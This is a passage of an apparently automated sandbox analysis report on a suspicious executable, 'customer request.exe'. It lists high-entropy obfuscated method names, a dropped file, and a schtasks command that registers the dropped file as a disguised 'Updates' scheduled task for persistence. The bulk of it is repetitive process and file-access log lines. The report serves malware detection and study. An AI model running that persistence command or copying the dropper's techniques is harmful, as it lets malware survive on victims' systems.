            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, MVyPJH5HJaOE2TxbUjq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NbqUwGSeEr', 'KNMUnq22sQ', 'uJoUMp0nDw', 'rhsUU1CKAj', 'llYUym3vpO', 'DIbUAq9Mdl', 'KClUFsDPiE'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, Ptwf96BE9v7EsISXRu.csHigh entropy of concatenated method names: 'DT5w2QTUt2', 'vmQwYY2fJM', 'Fn1wwYGkrp', 'WfmwMhVhRF', 'aggwy1A4JT', 'dkOwFK0eO3', 'Dispose', 'gbT4glsV2m', 'iQn4ct3qCB', 'ObV46D4KMW'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, gkL6jmNysptghdYcpQ.csHigh entropy of concatenated method names: 'WT70JO8d87', 'OeM0uNrdU4', 'n0O0v1kQWM', 'fNV0ZjLlQu', 'P9V07KIiLP', 'Ix90mRKsqL', 'CRv0bVT2Ya', 'meg0kopdKR', 'vIy0Q2emXi', 'hiH01IZE5v'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, efgmRCKKu8Y2Q97foO.csHigh entropy of concatenated method names: 'lsWwv5l76I', 'OHCwZouhQj', 'OtDwfNLBMB', 'lrew77UQ3i', 'YhcwmigoqM', 'wyKwRnaenT', 'K7twbqfLfd', 'A2VwkAEIoC', 'NiGwe8Sy3g', 'lFXwQ3mQ3d'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, AGdSZhHM1AGYJCpOk9.csHigh entropy of concatenated method names: 'b3H5WxaQCH', 'pgI5sNh8Um', 'F3e53BbehX', 'Jf95PxeXfK', 'h3U52Vqh8Y', 'g6S5LJOkgC', 'd5RL95mYMnjjuBe4Rj', 'cckOkJPoExnUEyB30h', 'J8Y55u7Hl4', 'JDU5Vk6F0P'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, MXfKbGljepPOW63UVq.csHigh entropy of concatenated method names: 'Dl8Tol0IJ8', 'j4LTGm2bkw', 'yMU6fVLAfv', 'EJs67tShQs', 'bnA6mZUVNP', 'z4u6RyNidB', 'zs26bahn8k', 'Wfq6kFvfCK', 'h3Q6erch1b', 'JUQ6QolMBm'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, hMaaplu3eBbehXmf9x.csHigh entropy of concatenated method names: 'r8O6hxoxip', 'AO16EVv3QZ', 'LrM6Ji9VuS', 'tx16uxOsJq', 'XlF62Cj3oO', 'KMp6LykNBx', 'u8C6YMSvTL', 'MRX64HioBa', 'HTE6wIg0yy', 'oi26nuUIf7'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, pwqggszUXKQrHygH4t.csHigh entropy of concatenated method names: 'LS5nEoOcHd', 'c9AnJeSxNb', 'vGknu7p0mF', 'a1Wnvdl27U', 'TJRnZwrCDN', 'CX2n7smJ5i', 'TnhnmsG4kq', 'URxnFx4CJT', 'a8onCsgY8b', 'MI4ntd4iaE'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, exaQCHJYgINh8UmdbN.csHigh entropy of concatenated method names: 'M2ecI2gMWG', 'clgcimHOZI', 'BsAcxn0vOE', 'TZjcdwQ6xN', 'F9EcX0jiOv', 'I6wcqDe6TS', 'uGjcBq5eQU', 'L5kc8HnPgG', 'Bc6cKT2mmN', 't44c9TLQh1'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, BdwHJypWnaQtGhd35f.csHigh entropy of concatenated method names: 'RZ6Sr8aGS', 'sbghegMGF', 'KyKEpC6Vf', 'G4sG4lqAV', 'jcHurZWjO', 'QBYlnX5OH', 'lNqbd5M8oNICu2qGva', 'npHieFCnSlimZ5OPIt', 'iJo4MQHV4', 'R9PnygSTr'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, YIi2h6cHyIdwL6sDQo.csHigh entropy of concatenated method names: 'Dispose', 'G7E5KsISXR', 'r7gpZlv6aB', 'Wx7qtMyhU7', 'E6s59YTDan', 'qVN5zrr6dW', 'ProcessDialogKey', 'fuOpafgmRC', 'Xu8p5Y2Q97', 'HoOppW67m4'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, Ec2XMFxfaiHxkRmBmn.csHigh entropy of concatenated method names: 'ToString', 'ImDL1ii5T7', 'oSnLZKBFoP', 'TowLfaS0KN', 'SbUL7J1iTb', 'A16LmWC0kF', 'pc6LRqxr5s', 'qigLbkt3yk', 'ysrLkRxWfo', 'YsgLeIwmhq'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, Tnqhso5aBiL7pIZ1D2n.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DRTn1VhWP5', 'KVUnDADir4', 'A9knNXpfBu', 'Vh2nId0mKA', 'PXjnig733N', 'LnDnxmaS3K', 'J2qndT6EGQ'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, A8Yc6SvJOkgCLfdkMW.csHigh entropy of concatenated method names: 'ptLjOVwp1e', 'nCijcBdNTj', 'li7jT7hraB', 'ErojWOb2g9', 'ACyjsV5dpp', 'XhFTX2MRJM', 'NpQTq07fil', 'PoCTB67wwt', 'QfFT8EZ84m', 'CrPTKjNyGb'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, s7tEnZsGU0CiWE4q63.csHigh entropy of concatenated method names: 'oe9VOO3FZP', 'M6lVgmVuKV', 'Rh9Vc16JqN', 'rITV6tGqBN', 'TyrVT9rcB0', 'awuVjZgmQj', 'uXQVWtAc5t', 'Xw2VssPjMs', 'ubZVrNQcsr', 'LLHV35UkIq'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, j67m479qTcYDg5Qguq.csHigh entropy of concatenated method names: 'rWRn67XBtS', 'uHSnTDBg29', 'G0Bnj4jEbH', 'hchnWfXOci', 'JGJnwOykBq', 'zaLnsA5xwV', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, mp4sV1dn69wNfhIg3N.csHigh entropy of concatenated method names: 'NRYY3kRiS8', 'AdUYPsDHYP', 'ToString', 'T7iYgihKCL', 'IWrYcvwejs', 'mXXY6wP20F', 'vPDYTHRJ8D', 'AFUYjB6s1p', 'MNsYWKoAo3', 'K9HYsHrlQe'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, UpvgWE5pceq8dtfURFr.csHigh entropy of concatenated method names: 'ToString', 'p4CMJKiTqA', 'n1lMuDJFU7', 'VEsMlJTO7b', 'OxQMvc1Ubp', 'EqRMZt81IB', 'VrTMflldGA', 'h9sM7h72F5', 'eJBNabYn6yMXT5csZeZ', 'VIJoXiYLw5bWIi32E7T'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, ggYHRHqDX7wH0p7mYb.csHigh entropy of concatenated method names: 'J73Y8PFY2T', 'TLrY9ivX8Y', 'Kvo4aMBHjv', 'HTK45ilxZh', 'NGTY1fSZZ3', 'nZbYDpQGqk', 'OqoYNRT7Pl', 'wpAYIQtmGM', 'x8BYi5Ms0i', 'zXsYxaqTxj'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, TfOtqUbyxqV9FU2AH5.csHigh entropy of concatenated method names: 'eIDWgaj1M6', 's77W6XeIoS', 'eIpWjjRaZ2', 'acXj9hQliE', 'Lqfjz0WZ6s', 'MaSWaBNtRg', 'K71W5E7v3d', 'HGOWpjuXas', 'XEvWVeRDEu', 'mZKWH2cUUf'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, IcyCVre0gh9TpvYKf1.csHigh entropy of concatenated method names: 'MNeWCSbEEL', 'NK2Wtklbot', 'etZWSBf0h0', 'dkcWhCRXrC', 'ShJWooJn1n', 'mXdWEDVOF5', 'grFWGfVeWZ', 'YIvWJBJGeI', 'VVCWua1HIn', 'i09WlonLll'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, qMAX89556eugk2HNcXE.csHigh entropy of concatenated method names: 'oMan9LWHj3', 'Gk5nzkplLX', 'fLVMa6cV2R', 'pdnM5CbMGg', 'ObmMpocVdS', 'oMGMV7YRp8', 'zMOMHyrDQW', 'TyJMOeA9nh', 'Y5jMgY0R5G', 'WoqMc9VnIC'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, YE2KE66fLmJbymeiDC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z5fpKX4veK', 'JFHp9GXqxf', 'RnQpzq6MxA', 'faLVarnmO4', 'HgMV5EIeH7', 'OVeVprlu1X', 'R3wVV1hNnT', 'KyjmATyjVy5AIUHxCJe'
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, MVyPJH5HJaOE2TxbUjq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NbqUwGSeEr', 'KNMUnq22sQ', 'uJoUMp0nDw', 'rhsUU1CKAj', 'llYUym3vpO', 'DIbUAq9Mdl', 'KClUFsDPiE'
            Source: C:\Users\user\Desktop\customer request.exeFile created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
